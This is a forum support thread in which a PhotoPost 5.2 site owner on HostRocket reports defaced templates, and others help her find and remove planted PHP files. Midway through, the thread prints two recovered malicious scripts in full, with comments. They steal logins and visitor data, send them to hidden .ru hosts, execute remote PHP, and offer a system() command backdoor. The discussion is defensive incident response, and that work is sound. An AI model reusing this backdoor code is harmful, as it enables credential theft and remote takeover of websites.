PhotoPost 5.2 - I got hacked - how do I prevent this?

I am running PhotoPost 5.2 on HostRocket. Yesterday someone changed 3 templates: login.tmpl, searchbox.tmpl, showgallery.tmpl. A link to another website was added to each of these templates (they broke the showgallery template so the site was not working). I re-uploaded all the templates and everything was fine. I checked the folder permissions settings on HostRocket and the templates folder is 755. How were these hackers able to change these files?
Check your data directories

Hi Pauline, This happened to me also, in fact just recently. Pretty scary. It's not the fault of Photopost. If anyone's, I would question HostRocket's security but I don't know enough about it to say anything. One thing I did do is notify HostRocket and then once I secured some of the hacker's files, sent them to HostRocket. One of the major places I was hacked was in the DATA directories. You might want to check and see if you have any unusual *.php files in there. There shouldn't be any. The hackers have a way of running a decoder to decode your password. What was the link that was added? I was advised to change passwords immediately. I'd suggest you do the same. Good Luck, DonnaM
There are PHP files all through my data directory! I have over 13000 photos, most in albums - so this is going to be a ton of work to go into each folder and delete the PHP files. Can someone from PhotoPost give me a second opinion on this? Should all PHP files in the data folders be deleted? What password did you change - your webhosting password with HostRocket or admin password on PhotoPost? Do you think they got in through FTP with HostRocket or by logging into the PhotoPost admin section?

These were the sites they linked to (with DOT instead of . so the links don't work):
devDOTytongDOTno/img/shake%20v3%20hacked%20download.jsp - shake v3 hacked download
wwwDOTmedicalmanpowersolutionsDOTcom/JWIRC%2B1%2B7%2BSERIAL.phtml - JWIRC 1 7 SERIAL
freesex-storiesDOTcom/free_sex_stories/cd%2Bkey%2Bfor%2Bnfs7.phtml - cd key for nfs7
We had the same problem with Donna's machine; hostrocket server with thousands of PHP scripts located throughout her website (not just PhotoPost directories, in *every* directory on her server). Change your ftp password - we were able to determine that her files were uploaded 4 months ago using FTP. All the php files should be removed from the data directory; but you should look throughout your website, because if you have the same issue as Donna's they will be everywhere. |
How were they able to change my templates? I will change my FTP password with HostRocket and start deleting the PHP files (and check for others). Permissions on my DATA folder are 777 - is that what they should be? |
777 is fine. The files were randomly named; so if they are in a directory with other PHP scripts they may be hard to find. As to how the files were changed; if they had FTP access to your machine, they could change any file. |
Hi Pauline, The reason I had you check the data directories is because that would be the most obvious sighting. Like Michael said, they were all over. Yours are a bit different than mine. What I would do if I were you is to contact HostRocket, tell them what's happening. They may clean it up for you faster than you can manually. DonnaM |
Just curious, what's the date on the scripts you are finding? |
October 15 - yesterday. That was when we saw the new links on the login page and the search box. This is a good excuse for me to clean up my folders - with each new release I upload the new files, but have not been deleting files not used. I had lots of folders in the UPLOADS folder. I will work my way through all the data folders tonight.

I kept some of the files they uploaded:

INCLUDE.PHP

```php
<?php
error_reporting(0);
// Any login name / password POSTed to the page is captured and appended to the
// phone-home request (base64-encoded when the "input" flag is set).
if(isset($_POST["l"]) and isset($_POST["p"])){
    if(isset($_POST["input"])){$user_auth="&l=". base64_encode($_POST["l"]) ."&p=". base64_encode(md5($_POST["p"]));}
    else{$user_auth="&l=". $_POST["l"] ."&p=". $_POST["p"];}
}else{$user_auth="";}
if(!isset($_POST["log_flg"])){$log_flg="&log";}
// The base64 string decodes to an http:// URL on bis.iframe.ru. The visitor's IP,
// the requested URL and the captured login are sent there, and whatever that host
// returns is executed as PHP (remote include).
if(! @include_once(base64_decode("aHR0cDovL2Jpcy5pZnJhbWUucnUvbWFzdGVyLnBocD9yX2FkZHI9") . sprintf("%u", ip2long(getenv(REMOTE_ADDR))) ."&url=". base64_encode($_SERVER["SERVER_NAME"] . $_SERVER[REQUEST_URI]) . $user_auth . $log_flg)) {
    // Fallback when the remote host cannot be reached: a command-execution backdoor
    // driven by a GET parameter, plus a "are you alive" check via uname.
    if(isset($_GET["a3kfj39fsj2"])){system($_GET["a3kfj39fsj2"]);}
    if($_POST["l"]=="special"){print "sys_active". `uname -a`;}
}
?>
```

GUEST.PHP

```php
<?
error_reporting(0);
$s="e";
// Collect host, script path, query string, referer, user agent and client IP,
// falling back to the old register_globals names on older PHP.
$a=(isset($_SERVER["HTTP_HOST"]) ? $_SERVER["HTTP_HOST"] : $HTTP_HOST);
$b=(isset($_SERVER["SERVER_NAME"]) ? $_SERVER["SERVER_NAME"] : $SERVER_NAME);
$c=(isset($_SERVER["REQUEST_URI"]) ? $_SERVER["REQUEST_URI"] : $REQUEST_URI);
$d=(isset($_SERVER["PHP_SELF"]) ? $_SERVER["PHP_SELF"] : $PHP_SELF);
$e=(isset($_SERVER["QUERY_STRING"]) ? $_SERVER["QUERY_STRING"] : $QUERY_STRING);
$f=(isset($_SERVER["HTTP_REFERER"]) ? $_SERVER["HTTP_REFERER"] : $HTTP_REFERER);
$g=(isset($_SERVER["HTTP_USER_AGENT"]) ? $_SERVER["HTTP_USER_AGENT"] : $HTTP_USER_AGENT);
$h=(isset($_SERVER["REMOTE_ADDR"]) ? $_SERVER["REMOTE_ADDR"] : $REMOTE_ADDR);
$str=base64_encode($a).".".base64_encode($b).".".base64_encode($c).".".base64_encode($d).".".base64_encode($e).".".base64_encode($f).".".base64_encode($g).".".base64_encode($h).".$s";
// The base64 strings decode to http://user9.mshtml.ru and http://user7.htmltags.ru.
// The collected request data is sent to the first host (or the second if that fails)
// and the response is executed as PHP.
if ((include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjkubXNodG1sLnJ1")."/?".$str))){}
else {include(base64_decode("aHR0cDovLw==").base64_decode("dXNlcjcuaHRtbHRhZ3MucnU=")."/?".$str);}
?>
```
guest.php is identical to the ones we found on Donna's server. |
Yes, and the name on the one is ....... the same as the name on mine. I had other ones. Sounds like the same person who hacked into mine .... coincidentally also with HostRocket. You also need to go into HostRocket and look for ".htaccess" files. When you find any ".htaccess" files that make reference to the planted php files ... delete them but you may want to save a few and send them off to HostRocket. Please let them know as this is 2 attacks in a short period of time. What you need to be concerned about is the security of your site. I'm advised to shut down my site and wipe it clean and rebuild with better security. Good Luck, DonnaM
HostRocket is telling me that the problem is with a vulnerable script - "a security flaw in a script installed on the account is used to add files in the same way that many scripts are designed to legitimately allow users to add/upload files". So, it seems that PhotoPost is blaming HostRocket and HostRocket is blaming PhotoPost. Were there security problems with earlier versions of PhotoPost (I found some information about hacking PhotoPost on the web)? Could it have happened because I had old PhotoPost files on the server? When I upgraded the last few times, I did not delete the old files that were no longer used (they are gone now). How should permissions be set on all the PhotoPost folders? I want to go through and check that. |
Here are the install instructions with directory and file permissions: http://www.photopost.com/installphp.html I can tell you version 5.0 of our script was gone over totally by an independent security company and we received a seal of approval making sure our script was totally secure. There were in prior versions some security holes, just like any script. Most of these holes come from vulnerabilities in PHP itself. I find it a particularly strong coincidence that both these accounts that were hacked are on HOSTROCKET. Michael can respond more on this since he was the one who worked hands on in Donna's account on specifics here.
Thanks - I will check all my permissions (but they are probably correct because you set up this system for me originally :) ). I also run PhotoPost on another site - hosted by CrystalTech - and have not upgraded to 5.2 yet. Will do that today!! |
Again, the two factors which point away from PhotoPost are: 1) Files are located throughout site, not just PhotoPost directories 2) Files are owned by FTP and were not uploaded via a script (which would then make them owned by the web server) Based on those two factors, I don't believe the items came from our script use. |
For reference, when I was hacked on HostRocket it was due to a script I had installed. Mine was actually a web hosting package. Do you have any other software installed? I'd check everything. Also, make sure your passwords are VERY strong. I now have a dedicated server and I get hundreds, if not thousands, of password hack attempts every day. Just the nature of the beast. Good luck! |
HostRocket deleted all the PHP files in the data folder and I checked all the other folders and deleted the PHP files that were put there. I checked all my permissions. Everything seems fine and is working fine. The only thing I run on this site is PhotoPost. I have a couple of web pages that I upload with FrontPage, but everything else is PhotoPost. (My main site www.slowtrav.com is at a different URL, different webhost. This site is only for our community photos.) I spent the day making changes to the templates (something I have been putting off for ages). I don't know how they got into my account, but it seems like it is because of HostRocket. I changed my FTP password. Thanks everyone for your help! |